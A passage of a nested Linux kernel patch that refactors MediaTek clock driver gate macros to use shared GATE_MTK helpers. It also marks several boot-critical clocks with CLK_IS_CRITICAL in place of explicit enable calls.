+-	.id = _id,						\
+-	.name = _name,						\
+-	.parent_name = _parent,					\
+-	.regs = &infra1_cg_regs,				\
+-	.shift = _shift,					\
+-	.ops = &mtk_clk_gate_ops_setclr,			\
+-	.flags = _flags,					\
+-}
++#define GATE_ICG1_FLAGS(_id, _name, _parent, _shift, _flags)		\
++	GATE_MTK_FLAGS(_id, _name, _parent, &infra1_cg_regs, _shift,	\
++		       &mtk_clk_gate_ops_setclr, _flags)
+ 
+-#define GATE_ICG2(_id, _name, _parent, _shift)			\
+-	GATE_ICG2_FLAGS(_id, _name, _parent, _shift, 0)
++#define GATE_ICG2(_id, _name, _parent, _shift)				\
++	GATE_MTK(_id, _name, _parent, &infra2_cg_regs, _shift, &mtk_clk_gate_ops_setclr)
+ 
+-#define GATE_ICG2_FLAGS(_id, _name, _parent, _shift, _flags) {	\
+-	.id = _id,						\
+-	.name = _name,						\
+-	.parent_name = _parent,					\
+-	.regs = &infra2_cg_regs,				\
+-	.shift = _shift,					\
+-	.ops = &mtk_clk_gate_ops_setclr,			\
+-	.flags = _flags,					\
+-}
++#define GATE_ICG2_FLAGS(_id, _name, _parent, _shift, _flags)		\
++	GATE_MTK_FLAGS(_id, _name, _parent, &infra2_cg_regs, _shift,	\
++		       &mtk_clk_gate_ops_setclr, _flags)
+ 
+ /*
+  * Clock gates dramc and dramc_b are needed by the DRAM controller.
+diff --git a/drivers/clk/mediatek/clk-mt7622-aud.c b/drivers/clk/mediatek/clk-mt7622-aud.c
+index 9f2e5aa7b5d9b..b17731fa11445 100644
+--- a/drivers/clk/mediatek/clk-mt7622-aud.c
++++ b/drivers/clk/mediatek/clk-mt7622-aud.c
+@@ -16,41 +16,17 @@
+ 
+ #include <dt-bindings/clock/mt7622-clk.h>
+ 
+-#define GATE_AUDIO0(_id, _name, _parent, _shift) {	\
+-		.id = _id,				\
+-		.name = _name,				\
+-		.parent_name = _parent,			\
+-		.regs = &audio0_cg_regs,			\
+-		.shift = _shift,			\
+-		.ops = &mtk_clk_gate_ops_no_setclr,	\
+-	}
++#define GATE_AUDIO0(_id, _name, _parent, _shift)		\
++	GATE_MTK(_id, _name, _parent, &audio0_cg_regs, _shift, &mtk_clk_gate_ops_no_setclr)
+ 
+-#define GATE_AUDIO1(_id, _name, _parent, _shift) {	\
+-		.id = _id,				\
+-		.name = _name,				\
+-		.parent_name = _parent,			\
+-		.regs = &audio1_cg_regs,			\
+-		.shift = _shift,			\
+-		.ops = &mtk_clk_gate_ops_no_setclr,	\
+-	}
++#define GATE_AUDIO1(_id, _name, _parent, _shift)		\
++	GATE_MTK(_id, _name, _parent, &audio1_cg_regs, _shift, &mtk_clk_gate_ops_no_setclr)
+ 
+-#define GATE_AUDIO2(_id, _name, _parent, _shift) {	\
+-		.id = _id,				\
+-		.name = _name,				\
+-		.parent_name = _parent,			\
+-		.regs = &audio2_cg_regs,			\
+-		.shift = _shift,			\
+-		.ops = &mtk_clk_gate_ops_no_setclr,	\
+-	}
++#define GATE_AUDIO2(_id, _name, _parent, _shift)		\
++	GATE_MTK(_id, _name, _parent, &audio2_cg_regs, _shift, &mtk_clk_gate_ops_no_setclr)
+ 
+-#define GATE_AUDIO3(_id, _name, _parent, _shift) {	\
+-		.id = _id,				\
+-		.name = _name,				\
+-		.parent_name = _parent,			\
+-		.regs = &audio3_cg_regs,			\
+-		.shift = _shift,			\
+-		.ops = &mtk_clk_gate_ops_no_setclr,	\
+-	}
++#define GATE_AUDIO3(_id, _name, _parent, _shift)		\
++	GATE_MTK(_id, _name, _parent, &audio3_cg_regs, _shift, &mtk_clk_gate_ops_no_setclr)
+ 
+ static const struct mtk_gate_regs audio0_cg_regs = {
+ 	.set_ofs = 0x0,
+diff --git a/drivers/clk/mediatek/clk-mt7622-eth.c b/drivers/clk/mediatek/clk-mt7622-eth.c
+index 43de0477d5d99..a60190e834186 100644
+--- a/drivers/clk/mediatek/clk-mt7622-eth.c
++++ b/drivers/clk/mediatek/clk-mt7622-eth.c
+@@ -16,14 +16,8 @@
+ 
+ #include <dt-bindings/clock/mt7622-clk.h>
+ 
+-#define GATE_ETH(_id, _name, _parent, _shift) {	\
+-		.id = _id,				\
+-		.name = _name,				\
+-		.parent_name = _parent,			\
+-		.regs = &eth_cg_regs,			\
+-		.shift = _shift,			\
+-		.ops = &mtk_clk_gate_ops_no_setclr_inv,	\
+-	}
++#define GATE_ETH(_id, _name, _parent, _shift)			\
++	GATE_MTK(_id, _name, _parent, &eth_cg_regs, _shift, &mtk_clk_gate_ops_no_setclr_inv)
+ 
+ static const struct mtk_gate_regs eth_cg_regs = {
+ 	.set_ofs = 0x30,
+@@ -45,14 +39,8 @@ static const struct mtk_gate_regs sgmii_cg_regs = {
+ 	.sta_ofs = 0xE4,
+ };
+ 
+-#define GATE_SGMII(_id, _name, _parent, _shift) {	\
+-		.id = _id,				\
+-		.name = _name,				\
+-		.parent_name = _parent,			\
+-		.regs = &sgmii_cg_regs,			\
+-		.shift = _shift,			\
+-		.ops = &mtk_clk_gate_ops_no_setclr_inv,	\
+-	}
++#define GATE_SGMII(_id, _name, _parent, _shift)			\
++	GATE_MTK(_id, _name, _parent, &sgmii_cg_regs, _shift, &mtk_clk_gate_ops_no_setclr_inv)
+ 
+ static const struct mtk_gate sgmii_clks[] = {
+ 	GATE_SGMII(CLK_SGMII_TX250M_EN, "sgmii_tx250m_en",
+diff --git a/drivers/clk/mediatek/clk-mt7622-hif.c b/drivers/clk/mediatek/clk-mt7622-hif.c
+index 67e96231dd25b..55baa6d06a205 100644
+--- a/drivers/clk/mediatek/clk-mt7622-hif.c
++++ b/drivers/clk/mediatek/clk-mt7622-hif.c
+@@ -16,23 +16,11 @@
+ 
+ #include <dt-bindings/clock/mt7622-clk.h>
+ 
+-#define GATE_PCIE(_id, _name, _parent, _shift) {	\
+-		.id = _id,				\
+-		.name = _name,				\
+-		.parent_name = _parent,			\
+-		.regs = &pcie_cg_regs,			\
+-		.shift = _shift,			\
+-		.ops = &mtk_clk_gate_ops_no_setclr_inv,	\
+-	}
++#define GATE_PCIE(_id, _name, _parent, _shift)				\
++	GATE_MTK(_id, _name, _parent, &pcie_cg_regs, _shift, &mtk_clk_gate_ops_no_setclr_inv)
+ 
+-#define GATE_SSUSB(_id, _name, _parent, _shift) {	\
+-		.id = _id,				\
+-		.name = _name,				\
+-		.parent_name = _parent,			\
+-		.regs = &ssusb_cg_regs,			\
+-		.shift = _shift,			\
+-		.ops = &mtk_clk_gate_ops_no_setclr_inv,	\
+-	}
++#define GATE_SSUSB(_id, _name, _parent, _shift)				\
++	GATE_MTK(_id, _name, _parent, &ssusb_cg_regs, _shift, &mtk_clk_gate_ops_no_setclr_inv)
+ 
+ static const struct mtk_gate_regs pcie_cg_regs = {
+ 	.set_ofs = 0x30,
+diff --git a/drivers/clk/mediatek/clk-mt7622.c b/drivers/clk/mediatek/clk-mt7622.c
+index 3b55f8641fae0..eebbb87906930 100644
+--- a/drivers/clk/mediatek/clk-mt7622.c
++++ b/drivers/clk/mediatek/clk-mt7622.c
+@@ -50,59 +50,28 @@
+ 		 _pd_reg, _pd_shift, _tuner_reg, _pcw_reg, _pcw_shift,  \
+ 		 NULL, "clkxtal")
+ 
+-#define GATE_APMIXED(_id, _name, _parent, _shift) {			\
+-		.id = _id,						\
+-		.name = _name,						\
+-		.parent_name = _parent,					\
+-		.regs = &apmixed_cg_regs,				\
+-		.shift = _shift,					\
+-		.ops = &mtk_clk_gate_ops_no_setclr_inv,			\
+-	}
++#define GATE_APMIXED_AO(_id, _name, _parent, _shift)			\
++	GATE_MTK_FLAGS(_id, _name, _parent, &apmixed_cg_regs, _shift,	\
++		 &mtk_clk_gate_ops_no_setclr_inv, CLK_IS_CRITICAL)
+ 
+-#define GATE_INFRA(_id, _name, _parent, _shift) {			\
+-		.id = _id,						\
+-		.name = _name,						\
+-		.parent_name = _parent,					\
+-		.regs = &infra_cg_regs,					\
+-		.shift = _shift,					\
+-		.ops = &mtk_clk_gate_ops_setclr,			\
+-	}
++#define GATE_INFRA(_id, _name, _parent, _shift)				\
++	GATE_MTK(_id, _name, _parent, &infra_cg_regs, _shift, &mtk_clk_gate_ops_setclr)
+ 
+-#define GATE_TOP0(_id, _name, _parent, _shift) {			\
+-		.id = _id,						\
+-		.name = _name,						\
+-		.parent_name = _parent,					\
+-		.regs = &top0_cg_regs,					\
+-		.shift = _shift,					\
+-		.ops = &mtk_clk_gate_ops_no_setclr,			\
+-	}
++#define GATE_TOP0(_id, _name, _parent, _shift)				\
++	GATE_MTK(_id, _name, _parent, &top0_cg_regs, _shift, &mtk_clk_gate_ops_no_setclr)
+ 
+-#define GATE_TOP1(_id, _name, _parent, _shift) {			\
+-		.id = _id,						\
+-		.name = _name,						\
+-		.parent_name = _parent,					\
+-		.regs = &top1_cg_regs,					\
+-		.shift = _shift,					\
+-		.ops = &mtk_clk_gate_ops_no_setclr,			\
+-	}
++#define GATE_TOP1(_id, _name, _parent, _shift)				\
++	GATE_MTK(_id, _name, _parent, &top1_cg_regs, _shift, &mtk_clk_gate_ops_no_setclr)
+ 
+-#define GATE_PERI0(_id, _name, _parent, _shift) {			\
+-		.id = _id,						\
+-		.name = _name,						\
+-		.parent_name = _parent,					\
+-		.regs = &peri0_cg_regs,					\
+-		.shift = _shift,					\
+-		.ops = &mtk_clk_gate_ops_setclr,			\
+-	}
++#define GATE_PERI0(_id, _name, _parent, _shift)				\
++	GATE_MTK(_id, _name, _parent, &peri0_cg_regs, _shift, &mtk_clk_gate_ops_setclr)
+ 
+-#define GATE_PERI1(_id, _name, _parent, _shift) {			\
+-		.id = _id,						\
+-		.name = _name,						\
+-		.parent_name = _parent,					\
+-		.regs = &peri1_cg_regs,					\
+-		.shift = _shift,					\
+-		.ops = &mtk_clk_gate_ops_setclr,			\
+-	}
++#define GATE_PERI0_AO(_id, _name, _parent, _shift)			\
++	GATE_MTK_FLAGS(_id, _name, _parent, &peri0_cg_regs, _shift,	\
++		 &mtk_clk_gate_ops_setclr, CLK_IS_CRITICAL)
++
++#define GATE_PERI1(_id, _name, _parent, _shift)				\
++	GATE_MTK(_id, _name, _parent, &peri1_cg_regs, _shift, &mtk_clk_gate_ops_setclr)
+ 
+ static DEFINE_SPINLOCK(mt7622_clk_lock);
+ 
+@@ -350,7 +319,7 @@ static const struct mtk_pll_data plls[] = {
+ };
+ 
+ static const struct mtk_gate apmixed_clks[] = {
+-	GATE_APMIXED(CLK_APMIXED_MAIN_CORE_EN, "main_core_en", "mainpll", 5),
++	GATE_APMIXED_AO(CLK_APMIXED_MAIN_CORE_EN, "main_core_en", "mainpll", 5),
+ };
+ 
+ static const struct mtk_gate infra_clks[] = {
+@@ -485,7 +454,7 @@ static const struct mtk_gate peri_clks[] = {
+ 	GATE_PERI0(CLK_PERI_AP_DMA_PD, "peri_ap_dma_pd", "axi_sel", 12),
+ 	GATE_PERI0(CLK_PERI_MSDC30_0_PD, "peri_msdc30_0", "msdc30_0_sel", 13),
+ 	GATE_PERI0(CLK_PERI_MSDC30_1_PD, "peri_msdc30_1", "msdc30_1_sel", 14),
+-	GATE_PERI0(CLK_PERI_UART0_PD, "peri_uart0_pd", "axi_sel", 17),
++	GATE_PERI0_AO(CLK_PERI_UART0_PD, "peri_uart0_pd", "axi_sel", 17),
+ 	GATE_PERI0(CLK_PERI_UART1_PD, "peri_uart1_pd", "axi_sel", 18),
+ 	GATE_PERI0(CLK_PERI_UART2_PD, "peri_uart2_pd", "axi_sel", 19),
+ 	GATE_PERI0(CLK_PERI_UART3_PD, "peri_uart3_pd", "axi_sel", 20),
+@@ -513,12 +482,12 @@ static struct mtk_composite infra_muxes[] = {
+ 
+ static struct mtk_composite top_muxes[] = {
+ 	/* CLK_CFG_0 */
+-	MUX_GATE(CLK_TOP_AXI_SEL, "axi_sel", axi_parents,
+-		 0x040, 0, 3, 7),
+-	MUX_GATE(CLK_TOP_MEM_SEL, "mem_sel", mem_parents,
+-		 0x040, 8, 1, 15),
+-	MUX_GATE(CLK_TOP_DDRPHYCFG_SEL, "ddrphycfg_sel", ddrphycfg_parents,
+-		 0x040, 16, 1, 23),
++	MUX_GATE_FLAGS(CLK_TOP_AXI_SEL, "axi_sel", axi_parents,
++		       0x040, 0, 3, 7, CLK_IS_CRITICAL),
++	MUX_GATE_FLAGS(CLK_TOP_MEM_SEL, "mem_sel", mem_parents,
++		       0x040, 8, 1, 15, CLK_IS_CRITICAL),
++	MUX_GATE_FLAGS(CLK_TOP_DDRPHYCFG_SEL, "ddrphycfg_sel", ddrphycfg_parents,
++		       0x040, 16, 1, 23, CLK_IS_CRITICAL),
+ 	MUX_GATE(CLK_TOP_ETH_SEL, "eth_sel", eth_parents,
+ 		 0x040, 24, 3, 31),
+ 
+@@ -655,10 +624,6 @@ static int mtk_topckgen_init(struct platform_device *pdev)
+ 	mtk_clk_register_gates(node, top_clks, ARRAY_SIZE(top_clks),
+ 			       clk_data);
+ 
+-	clk_prepare_enable(clk_data->hws[CLK_TOP_AXI_SEL]->clk);
+-	clk_prepare_enable(clk_data->hws[CLK_TOP_MEM_SEL]->clk);
+-	clk_prepare_enable(clk_data->hws[CLK_TOP_DDRPHYCFG_SEL]->clk);
+-
+ 	return of_clk_add_hw_provider(node, of_clk_hw_onecell_get, clk_data);
+ }
+ 
+@@ -701,9 +666,6 @@ static int mtk_apmixedsys_init(struct platform_device *pdev)
+ 	mtk_clk_register_gates(node, apmixed_clks,
+ 			       ARRAY_SIZE(apmixed_clks), clk_data);
+ 
+-	clk_prepare_enable(clk_data->hws[CLK_APMIXED_ARMPLL]->clk);
+-	clk_prepare_enable(clk_data->hws[CLK_APMIXED_MAIN_CORE_EN]->clk);
+-
+ 	return of_clk_add_hw_provider(node, of_clk_hw_onecell_get, clk_data);
+ }
+ 
+@@ -730,8 +692,6 @@ static int mtk_pericfg_init(struct platform_device *pdev)
+ 	if (r)
+ 		return r;
+ 
+-	clk_prepare_enable(clk_data->hws[CLK_PERI_UART0_PD]->clk);
+-
+ 	mtk_register_reset_controller_with_dev(&pdev->dev, &clk_rst_desc[1]);
+ 
+ 	return 0;
+diff --git a/drivers/clk/mediatek/clk-mt7629-eth.c b/drivers/clk/mediatek/clk-mt7629-eth.c
+index 282dd65594654..b0c8fa3b8bbec 100644
+--- a/drivers/clk/mediatek/clk-mt7629-eth.c
++++ b/drivers/clk/mediatek/clk-mt7629-eth.c
+@@ -16,14 +16,8 @@
+ 
+ #include <dt-bindings/clock/mt7629-clk.h>
+ 
+-#define GATE_ETH(_id, _name, _parent, _shift) {		\
+-		.id = _id,				\
+-		.name = _name,				\
+-		.parent_name = _parent,			\
+-		.regs = &eth_cg_regs,			\
+-		.shift = _shift,			\
+-		.ops = &mtk_clk_gate_ops_no_setclr_inv,	\
+-	}
++#define GATE_ETH(_id, _name, _parent, _shift)			\
++	GATE_MTK(_id, _name, _parent, &eth_cg_regs, _shift, &mtk_clk_gate_ops_no_setclr_inv)
+ 
+ static const struct mtk_gate_regs eth_cg_regs = {
+ 	.set_ofs = 0x30,
+@@ -45,14 +39,8 @@ static const struct mtk_gate_regs sgmii_cg_regs = {
+ 	.sta_ofs = 0xE4,
+ };
+ 
+-#define GATE_SGMII(_id, _name, _parent, _shift) {	\
+-		.id = _id,				\
+-		.name = _name,				\
+-		.parent_name = _parent,			\
+-		.regs = &sgmii_cg_regs,			\
+-		.shift = _shift,			\
+-		.ops = &mtk_clk_gate_ops_no_setclr_inv,	\
+-	}
++#define GATE_SGMII(_id, _name, _parent, _shift)			\
++	GATE_MTK(_id, _name, _parent, &sgmii_cg_regs, _shift, &mtk_clk_gate_ops_no_setclr_inv)
+ 
+ static const struct mtk_gate sgmii_clks[2][4] = {
+ 	{
+diff --git a/drivers/clk/mediatek/clk-mt7629-hif.c b/drivers/clk/mediatek/clk-mt7629-hif.c
+index 0c8b9e1397890..3628811a2f57f 100644
+--- a/drivers/clk/mediatek/clk-mt7629-hif.c
++++ b/drivers/clk/mediatek/clk-mt7629-hif.c
+@@ -16,23 +16,11 @@
+ 
+ #include <dt-bindings/clock/mt7629-clk.h>
+ 
+-#define GATE_PCIE(_id, _name, _parent, _shift) {	\
+-		.id = _id,				\
+-		.name = _name,				\
+-		.parent_name = _parent,			\
+-		.regs = &pcie_cg_regs,			\
+-		.shift = _shift,			\
+-		.ops = &mtk_clk_gate_ops_no_setclr_inv,	\
+-	}
++#define GATE_PCIE(_id, _name, _parent, _shift)				\
++	GATE_MTK(_id, _name, _parent, &pcie_cg_regs, _shift, &mtk_clk_gate_ops_no_setclr_inv)
+ 
+-#define GATE_SSUSB(_id, _name, _parent, _shift) {	\
+-		.id = _id,				\
+-		.name = _name,				\
+-		.parent_name = _parent,			\
+-		.regs = &ssusb_cg_regs,			\
+-		.shift = _shift,			\
+-		.ops = &mtk_clk_gate_ops_no_setclr_inv,	\
+-	}
++#define GATE_SSUSB(_id, _name, _parent, _shift)				\
++	GATE_MTK(_id, _name, _parent, &ssusb_cg_regs, _shift, &mtk_clk_gate_ops_no_setclr_inv)
+ 
+ static const struct mtk_gate_regs pcie_cg_regs = {
+ 	.set_ofs = 0x30,
+diff --git a/drivers/clk/mediatek/clk-mt7629.c b/drivers/clk/mediatek/clk-mt7629.c
+index e4a08c811adc2..0bc88b7d171b5 100644
+--- a/drivers/clk/mediatek/clk-mt7629.c
++++ b/drivers/clk/mediatek/clk-mt7629.c
+@@ -50,41 +50,17 @@
+ 		_pd_reg, _pd_shift, _tuner_reg, _pcw_reg, _pcw_shift,	\
+ 		NULL, "clk20m")
+ 
+-#define GATE_APMIXED(_id, _name, _parent, _shift) {	\
+-		.id = _id,				\
+-		.name = _name,				\
+-		.parent_name = _parent,			\
+-		.regs = &apmixed_cg_regs,		\
+-		.shift = _shift,			\
+-		.ops = &mtk_clk_gate_ops_no_setclr_inv,	\
+-	}
++#define GATE_APMIXED(_id, _name, _parent, _shift)			\
++	GATE_MTK(_id, _name, _parent, &apmixed_cg_regs, _shift, &mtk_clk_gate_ops_no_setclr_inv)
+ 
+-#define GATE_INFRA(_id, _name, _parent, _shift) {	\
+-		.id = _id,				\
+-		.name = _name,				\
+-		.parent_name = _parent,			\
+-		.regs = &infra_cg_regs,			\
+-		.shift = _shift,			\
+-		.ops = &mtk_clk_gate_ops_setclr,	\
+-	}
++#define GATE_INFRA(_id, _name, _parent, _shift)				\
++	GATE_MTK(_id, _name, _parent, &infra_cg_regs, _shift, &mtk_clk_gate_ops_setclr)
+ 
+-#define GATE_PERI0(_id, _name, _parent, _shift) {	\
+-		.id = _id,				\
+-		.name = _name,				\
+-		.parent_name = _parent,			\
+-		.regs = &peri0_cg_regs,			\
+-		.shift = _shift,			\
+-		.ops = &mtk_clk_gate_ops_setclr,	\
+-	}
++#define GATE_PERI0(_id, _name, _parent, _shift)				\
++	GATE_MTK(_id, _name, _parent, &peri0_cg_regs, _shift, &mtk_clk_gate_ops_setclr)
+ 
+-#define GATE_PERI1(_id, _name, _parent, _shift) {	\
+-		.id = _id,				\
+-		.name = _name,				\
+-		.parent_name = _parent,			\
+-		.regs = &peri1_cg_regs,			\
+-		.shift = _shift,			\
+-		.ops = &mtk_clk_gate_ops_setclr,	\
+-	}
++#define GATE_PERI1(_id, _name, _parent, _shift)				\
++	GATE_MTK(_id, _name, _parent, &peri1_cg_regs, _shift, &mtk_clk_gate_ops_setclr)
+ 
+ static DEFINE_SPINLOCK(mt7629_clk_lock);
+ 
+diff --git a/drivers/clk/mediatek/clk-mt7986-eth.c b/drivers/clk/mediatek/clk-mt7986-eth.c
+index 7868c0728e962..c21e1d672384a 100644
+--- a/drivers/clk/mediatek/clk-mt7986-eth.c
++++ b/drivers/clk/mediatek/clk-mt7986-eth.c
+@@ -22,12 +22,8 @@ static const struct mtk_gate_regs sgmii0_cg_regs = {
+ 	.sta_ofs = 0xe4,
+ };
+ 
+-#define GATE_SGMII0(_id, _name, _parent, _shift)                               \
+-	{                                                                      \
+-		.id = _id, .name = _name, .parent_name = _parent,              \
+-		.regs = &sgmii0_cg_regs, .shift = _shift,                      \
+-		.ops = &mtk_clk_gate_ops_no_setclr_inv,                        \
+-	}
++#define GATE_SGMII0(_id, _name, _parent, _shift)		\
++	GATE_MTK(_id, _name, _parent, &sgmii0_cg_regs, _shift, &mtk_clk_gate_ops_no_setclr_inv)
+ 
+ static const struct mtk_gate sgmii0_clks[] __initconst = {
+ 	GATE_SGMII0(CLK_SGMII0_TX250M_EN, "sgmii0_tx250m_en", "top_xtal", 2),
+@@ -42,12 +38,8 @@ static const struct mtk_gate_regs sgmii1_cg_regs = {
+ 	.sta_ofs = 0xe4,
+ };
+ 
+-#define GATE_SGMII1(_id, _name, _parent, _shift)                               \
+-	{                                                                      \
+-		.id = _id, .name = _name, .parent_name = _parent,              \
+-		.regs = &sgmii1_cg_regs, .shift = _shift,                      \
+-		.ops = &mtk_clk_gate_ops_no_setclr_inv,                        \
+-	}
++#define GATE_SGMII1(_id, _name, _parent, _shift)		\
++	GATE_MTK(_id, _name, _parent, &sgmii1_cg_regs, _shift, &mtk_clk_gate_ops_no_setclr_inv)
+ 
+ static const struct mtk_gate sgmii1_clks[] __initconst = {
+ 	GATE_SGMII1(CLK_SGMII1_TX250M_EN, "sgmii1_tx250m_en", "top_xtal", 2),
+@@ -62,12 +54,8 @@ static const struct mtk_gate_regs eth_cg_regs = {
+ 	.sta_ofs = 0x30,
+ };
+ 
+-#define GATE_ETH(_id, _name, _parent, _shift)                                  \
+-	{                                                                      \
+-		.id = _id, .name = _name, .parent_name = _parent,              \
+-		.regs = &eth_cg_regs, .shift = _shift,                         \
+-		.ops = &mtk_clk_gate_ops_no_setclr_inv,                        \
+-	}
++#define GATE_ETH(_id, _name, _parent, _shift)			\
++	GATE_MTK(_id, _name, _parent, &eth_cg_regs, _shift, &mtk_clk_gate_ops_no_setclr_inv)
+ 
+ static const struct mtk_gate eth_clks[] __initconst = {
+ 	GATE_ETH(CLK_ETH_FE_EN, "eth_fe_en", "netsys_2x_sel", 6),
+diff --git a/drivers/clk/mediatek/clk-mt7986-infracfg.c b/drivers/clk/mediatek/clk-mt7986-infracfg.c
+index 49666047bf0ed..74e68a7197301 100644
+--- a/drivers/clk/mediatek/clk-mt7986-infracfg.c
++++ b/drivers/clk/mediatek/clk-mt7986-infracfg.c
+@@ -87,26 +87,14 @@ static const struct mtk_gate_regs infra2_cg_regs = {
+ 	.sta_ofs = 0x68,
+ };
+ 
+-#define GATE_INFRA0(_id, _name, _parent, _shift)                               \
+-	{                                                                      \
+-		.id = _id, .name = _name, .parent_name = _parent,              \
+-		.regs = &infra0_cg_regs, .shift = _shift,                      \
+-		.ops = &mtk_clk_gate_ops_setclr,                               \
+-	}
++#define GATE_INFRA0(_id, _name, _parent, _shift)			\
++	GATE_MTK(_id, _name, _parent, &infra0_cg_regs, _shift, &mtk_clk_gate_ops_setclr)
+ 
+-#define GATE_INFRA1(_id, _name, _parent, _shift)                               \
+-	{                                                                      \
+-		.id = _id, .name = _name, .parent_name = _parent,              \
+-		.regs = &infra1_cg_regs, .shift = _shift,                      \
+-		.ops = &mtk_clk_gate_ops_setclr,                               \
+-	}
++#define GATE_INFRA1(_id, _name, _parent, _shift)			\
++	GATE_MTK(_id, _name, _parent, &infra1_cg_regs, _shift, &mtk_clk_gate_ops_setclr)
+ 
+-#define GATE_INFRA2(_id, _name, _parent, _shift)                               \
+-	{                                                                      \
+-		.id = _id, .name = _name, .parent_name = _parent,              \
+-		.regs = &infra2_cg_regs, .shift = _shift,                      \
+-		.ops = &mtk_clk_gate_ops_setclr,                               \
+-	}
++#define GATE_INFRA2(_id, _name, _parent, _shift)			\
++	GATE_MTK(_id, _name, _parent, &infra2_cg_regs, _shift, &mtk_clk_gate_ops_setclr)
+ 
+ static const struct mtk_gate infra_clks[] = {
+ 	/* INFRA0 */
+diff --git a/drivers/clk/mediatek/clk-mt8135.c b/drivers/clk/mediatek/clk-mt8135.c
+index b68888a034c40..3ea06d2ec2f11 100644
+--- a/drivers/clk/mediatek/clk-mt8135.c
++++ b/drivers/clk/mediatek/clk-mt8135.c
+@@ -2,6 +2,8 @@
+ /*
+  * Copyright (c) 2014 MediaTek Inc.
+  * Author: James Liao <jamesjj.liao@mediatek.com>
++ * Copyright (c) 2023 Collabora, Ltd.
++ *               AngeloGioacchino Del Regno <angelogioacchino.delregno@collabora.com>
+  */
+ 
+ #include <linux/clk.h>
+@@ -390,7 +392,7 @@ static const struct mtk_composite top_muxes[] __initconst = {
+ 	MUX_GATE(CLK_TOP_GCPU_SEL, "gcpu_sel", gcpu_parents, 0x0164, 24, 3, 31),
+ 	/* CLK_CFG_9 */
+ 	MUX_GATE(CLK_TOP_DPI1_SEL, "dpi1_sel", dpi1_parents, 0x0168, 0, 2, 7),
+-	MUX_GATE(CLK_TOP_CCI_SEL, "cci_sel", cci_parents, 0x0168, 8, 3, 15),
++	MUX_GATE_FLAGS(CLK_TOP_CCI_SEL, "cci_sel", cci_parents, 0x0168, 8, 3, 15, CLK_IS_CRITICAL),
+ 	MUX_GATE(CLK_TOP_APLL_SEL, "apll_sel", apll_parents, 0x0168, 16, 3, 23),
+ 	MUX_GATE(CLK_TOP_HDMIPLL_SEL, "hdmipll_sel", hdmipll_parents, 0x0168, 24, 2, 31),
+ };
+@@ -401,14 +403,12 @@ static const struct mtk_gate_regs infra_cg_regs = {
+ 	.sta_ofs = 0x0048,
+ };
+ 
+-#define GATE_ICG(_id, _name, _parent, _shift) {	\
+-		.id = _id,					\
+-		.name = _name,					\
+-		.parent_name = _parent,				\
+-		.regs = &infra_cg_regs,				\
+-		.shift = _shift,				\
+-		.ops = &mtk_clk_gate_ops_setclr,		\
+-	}
++#define GATE_ICG(_id, _name, _parent, _shift)	\
++	GATE_MTK(_id, _name, _parent, &infra_cg_regs, _shift, &mtk_clk_gate_ops_setclr)
++
++#define GATE_ICG_AO(_id, _name, _parent, _shift)	\
++	GATE_MTK_FLAGS(_id, _name, _parent, &infra_cg_regs, _shift,	\
++		       &mtk_clk_gate_ops_setclr, CLK_IS_CRITICAL)
+ 
+ static const struct mtk_gate infra_clks[] __initconst = {
+ 	GATE_ICG(CLK_INFRA_PMIC_WRAP, "pmic_wrap_ck", "axi_sel", 23),
+@@ -417,7 +417,7 @@ static const struct mtk_gate infra_clks[] __initconst = {
+ 	GATE_ICG(CLK_INFRA_CCIF0_AP_CTRL, "ccif0_ap_ctrl", "axi_sel", 20),
+ 	GATE_ICG(CLK_INFRA_KP, "kp_ck", "axi_sel", 16),
+ 	GATE_ICG(CLK_INFRA_CPUM, "cpum_ck", "cpum_tck_in", 15),
+-	GATE_ICG(CLK_INFRA_M4U, "m4u_ck", "mem_sel", 8),
++	GATE_ICG_AO(CLK_INFRA_M4U, "m4u_ck", "mem_sel", 8),
+ 	GATE_ICG(CLK_INFRA_MFGAXI, "mfgaxi_ck", "axi_sel", 7),
+ 	GATE_ICG(CLK_INFRA_DEVAPC, "devapc_ck", "axi_sel", 6),
+ 	GATE_ICG(CLK_INFRA_AUDIO, "audio_ck", "aud_intbus_sel", 5),
+@@ -438,23 +438,11 @@ static const struct mtk_gate_regs peri1_cg_regs = {
+ 	.sta_ofs = 0x001c,
+ };
+ 
+-#define GATE_PERI0(_id, _name, _parent, _shift) {	\
+-		.id = _id,					\
+-		.name = _name,					\
+-		.parent_name = _parent,				\
+-		.regs = &peri0_cg_regs,				\
+-		.shift = _shift,				\
+-		.ops = &mtk_clk_gate_ops_setclr,		\
+-	}
++#define GATE_PERI0(_id, _name, _parent, _shift)	\
++	GATE_MTK(_id, _name, _parent, &peri0_cg_regs, _shift, &mtk_clk_gate_ops_setclr)
+ 
+-#define GATE_PERI1(_id, _name, _parent, _shift) {	\
+-		.id = _id,					\
+-		.name = _name,					\
+-		.parent_name = _parent,				\
+-		.regs = &peri1_cg_regs,				\
+-		.shift = _shift,				\
+-		.ops = &mtk_clk_gate_ops_setclr,		\
+-	}
++#define GATE_PERI1(_id, _name, _parent, _shift)	\
++	GATE_MTK(_id, _name, _parent, &peri1_cg_regs, _shift, &mtk_clk_gate_ops_setclr)
+ 
+ static const struct mtk_gate peri_gates[] __initconst = {
+ 	/* PERI0 */
+@@ -551,8 +539,6 @@ static void __init mtk_topckgen_init(struct device_node *node)
+ 	mtk_clk_register_composites(top_muxes, ARRAY_SIZE(top_muxes), base,
+ 			&mt8135_clk_lock, clk_data);
+ 
+-	clk_prepare_enable(clk_data->hws[CLK_TOP_CCI_SEL]->clk);
+-
+ 	r = of_clk_add_hw_provider(node, of_clk_hw_onecell_get, clk_data);
+ 	if (r)
+ 		pr_err("%s(): could not register clock provider: %d\n",
+@@ -570,8 +556,6 @@ static void __init mtk_infrasys_init(struct device_node *node)
+ 	mtk_clk_register_gates(node, infra_clks, ARRAY_SIZE(infra_clks),
+ 						clk_data);
+ 
+-	clk_prepare_enable(clk_data->hws[CLK_INFRA_M4U]->clk);
+-
+ 	r = of_clk_add_hw_provider(node, of_clk_hw_onecell_get, clk_data);
+ 	if (r)
+ 		pr_err("%s(): could not register clock provider: %d\n",
+diff --git a/drivers/clk/mediatek/clk-mt8167-aud.c b/drivers/clk/mediatek/clk-mt8167-aud.c
+index ce1ae8d243c33..b5ac196cd9454 100644
+--- a/drivers/clk/mediatek/clk-mt8167-aud.c
++++ b/drivers/clk/mediatek/clk-mt8167-aud.c
+@@ -23,14 +23,9 @@ static const struct mtk_gate_regs aud_cg_regs = {
+ 	.sta_ofs = 0x0,
+ };
+ 
+-#define GATE_AUD(_id, _name, _parent, _shift) {	\
+-		.id = _id,			\
+-		.name = _name,			\
+-		.parent_name = _parent,		\
+-		.regs = &aud_cg_regs,		\
+-		.shift = _shift,		\
